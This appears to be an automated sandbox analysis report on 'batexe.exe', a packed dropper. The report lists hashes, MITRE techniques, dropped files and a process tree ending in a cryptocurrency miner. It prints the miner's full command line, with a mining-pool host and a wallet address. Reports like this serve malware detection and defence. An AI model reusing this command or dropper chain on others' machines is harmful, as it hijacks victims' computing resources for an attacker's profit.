73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
309s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 13:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1972	b2e.exe
3152	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
3152	cpuminer-sse2.exe
3152	cpuminer-sse2.exe
3152	cpuminer-sse2.exe
3152	cpuminer-sse2.exe
3152	cpuminer-sse2.exe
3152	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4192-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4192 wrote to memory of 1972	4192	batexe.exe	93
PID 4192 wrote to memory of 1972	4192	batexe.exe	93
PID 4192 wrote to memory of 1972	4192	batexe.exe	93
PID 1972 wrote to memory of 3700	1972	b2e.exe	94
PID 1972 wrote to memory of 3700	1972	b2e.exe	94
PID 1972 wrote to memory of 3700	1972	b2e.exe	94
PID 3700 wrote to memory of 3152	3700	cmd.exe	97
PID 3700 wrote to memory of 3152	3700	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4192
- C:\Users\Admin\AppData\Local\Temp\4DFC.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\4DFC.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\4DFC.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5C92.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3700
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4DFC.tmp\b2e.exe

Filesize
283KB

MD5
f21a9549955c3af289dd6f483c95077b

SHA1
7cb0a1a96be3d225dbfee43b11a90b9185779f2c

SHA256
8190b9e1fb84d18c74afab2b627ecba04a8bd0e7a7ccfd06295c4e980cf06af8

SHA512
3b9786297b104021554074a061f2b6ea2191d96f41dfe0ae6c0997240822ed51fc2a2b749e0c67915744be73d91ed00384e64bd00297aaa9a85a20fe9acfbb94

Download Submit
C:\Users\Admin\AppData\Local\Temp\4DFC.tmp\b2e.exe

Filesize
1.0MB

MD5
f831cc93cb6dd766d3d6e1e1e0fedb92

SHA1
712bd4a84d0bea064b8d8e1936eff91ed43ba974

SHA256
c3c1a37bf365530da8e6ee076df6b692c27458f461edc7278b985248dfe42abf

SHA512
3cf4644dfb1a01266951fa266e42c45fc08d19b55ef5a25cec23d95c301cbba9ed52b5caf82e7e54b55af6cb44f40da14a25783dda39adb0518ad69025e18fe1

Download Submit
C:\Users\Admin\AppData\Local\Temp\4DFC.tmp\b2e.exe

Filesize
983KB

MD5
520d622083df272b8e0c6391f9489065

SHA1
e9d40515d40b9383150987945acf9798da80b498

SHA256
306b25f0c19905f65ad15481170d3ccdb5b9e69fa93d4a20dbdd119cd2ae6be5

SHA512
5b3117c59e1f812c87211216482d287c063ca9af3140bd06d99e2f21d216a34ab6045e254bdd4c3b07e9b4dad538da64606cf178107cfe846c290c6507258d3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\5C92.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
309KB

MD5
efa917ef9ea0adc74843107a7b7b7c13

SHA1
06f6a9228c879959e04fab9e8ecaab63c27afddc

SHA256
7a9291f8314a4e4e12af5abc78dbdb123aa3f6856cabcbbf2fed61722b22b751

SHA512
6d36cac813ccbcf5a4d8859f576dafdffdd30c9bbe07a472149491a7a8d14d93c3b0b2b99ef2adb0990570b83c42bb69bd6edd51a26928eb485a582526d2efc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
350KB

MD5
967b05774fc443eabd381f4c8007427e

SHA1
29be90ea14cfc043b722afce9070f0484d1eff41

SHA256
af327928e7bd72bda9b41649ae838681c0b83e239b27ce2d3afcfe576e404f79

SHA512
f6c01cfa891a2f3ec0f90ef5eba830bf8ce9e67356facea84652201bd9a7acb1de213e63e5b7f1bf270a15270673e8419eca1c5c21a25393f74ec7d2c2d1a0d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
260KB

MD5
fc6fa7fec8b9b7af18dcf45e68d872a2

SHA1
5f7f4e75a778637fcc9c43b36d2fb037556db205

SHA256
6533c5da471ee535d34a8bd6ece64f2675e555170f82a00d3e38d28e682f44e4

SHA512
d731cf81bcd6ea352239a8433cc40f9c320e866396fbbdbc7418ce2ae8bb2baf15f7500761b2a720ff43cad341cf3d03acd2da5f96240a5e4163f618adc8a3a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
328KB

MD5
174b521b782265f923a7fbae8658546d

SHA1
0f4c5fef52695c7825c7c8eb30e70337ff945a91

SHA256
7f07adcac67010ec2a94033219224ad97c5955f91999d90679ce876f681d94ee

SHA512
c4f32de28b6db4336dc3a92a6294c83ed15516f56f2b1e9b3c7f0e0a5aa96e55503ed7e99472d9a21bc8b6a906004ec42d0dd9c89304abb89f85d0ccedcb3082

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
101KB

MD5
3fd8add599f102ead8982b3f744a7cca

SHA1
003210e5f1656fe264c7079d80308c2d155e2181

SHA256
18068e8dcd3a33df60b4e3270236f75a1f23381bd9ae371bf8c1df559266f487

SHA512
36bbd61d61656532342947f3439aa92b723148ff5e06e2d44239e27e3e8c5072614a45efe309c28cd8424a73c16ad73711b960c85cf8998995227dfdfb07d6fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
213KB

MD5
84243dd282386127df9a1d4cdbb49ad3

SHA1
c9f568151dc08f71d8d8543fd49b2980818f2a1b

SHA256
fef34cb2ef9ad4628c7ab04236c93b798c277c6dc828be0bc2a7a5facec2eb56

SHA512
49e259b538b70d2194634b637ee64946725ce1159400b0e814df0a71c2a202ac45614374fdc5028981d19cd55331d20f3aa0ee9b43eded98407cc3be30ff263e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
270KB

MD5
c1890489b4ea511dcfdd167930563329

SHA1
afaea864a424cee8ccf93c20bb9164b24048105c

SHA256
52c49aec83ee29c0d6ea0c8f26b34f8c756ffeaa2ed6b6b1e1fbb5e9f502595f

SHA512
db6db169d689e1068e1fede6f69d53776f1b88d835dd5b28f8f88973b73ab8c0a36fbd1f6301da02fef96158f3f3ae6e5736342b37b0b9fd3d3c0b98723dac09

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
193KB

MD5
f546dcf8025b4356acefcd92c0911f27

SHA1
5fb54374d39407ada9b093267300172205447d82

SHA256
9615b6dc4fd14226890b1853be7784c4435edaecdd0f458373f3590d51d80f5c

SHA512
0b09fd3e3d5271a661f0e538f22aea66c2bd84e32117a8a8b9cf2bcb02fbcb163e2a08b551c2e2668af7ccaa0e0412011e5df6d0ec1f30a8f7774791d9f30be7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
293KB

MD5
599425e871b232cdf7ea8092ac2a9300

SHA1
ea8f216315bbe4e59a9ae1264eecb22753cb53a9

SHA256
0f5501cc59a936066185bca1b5b51e66bbfbae34bc7ac9f7987c464cbb7c008e

SHA512
7bbc522057df368790caa4b60da83b97795a797bd32122fcd6519fa66dab93f717341ff7d105812da5e55515d3f7a35f4fdaa8b65edc3d62f87441bb9317d727

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
235KB

MD5
a1a04da0d14343a3f6373ec5224569d3

SHA1
e91082eeec67ed5a1839cbe08db741e89a008b92

SHA256
e5879eed635c998a6052772d7e4d909a1d1c8174d1b71dbd3a83cad27ceed52c

SHA512
02d1ed33719c6921625c03b934079a6796f6d684ef68c7069b4391d57054778144e453098b2eb11d491ad5108d4b2b9dfb86b1bb6b58bae04a8637789ba57c45

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
77KB

MD5
5b68dfb4c591bdb5abc3626c72ed09a2

SHA1
7bc0fb011a7f5ff4716b0f34adc639eec3bc9777

SHA256
6cb0897009c35d801c6fe48ec0cbaa1b6e8e3a074c9f8766795ba0333fe38ae0

SHA512
b54276ce70fbd76c99be44f122b2fb31b2382f15fa720ec88dd4c0f592eba2bb55b13becea0ed20f18684bdf6f488a5ec0ef7aa48d2c79d7103f8672fe8778b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
13KB

MD5
9e221a374a5f6abf8c598d94271ef4bc

SHA1
d456986fa36201c2853f923529a8a2bfa4950d46

SHA256
ddfaedcb356e043e2b16111099a67c6f0062da9deefb6e0f8b966b1b8623cda3

SHA512
d9520933b0f8c1a85b4be580f58a9cb7d209eaee59848ab2cf2cc882d39cd70161964d74c2e467992e547aca58cba343e7c75ab8b4b4e42ee043fa7f9bc3565a

Download Submit
memory/1972-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1972-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3152-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/3152-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3152-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3152-49-0x000000005EFE0000-0x000000005F078000-memory.dmp

Filesize
608KB

Download
memory/3152-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/3152-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/3152-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3152-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3152-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3152-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3152-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3152-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3152-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3152-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4192-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download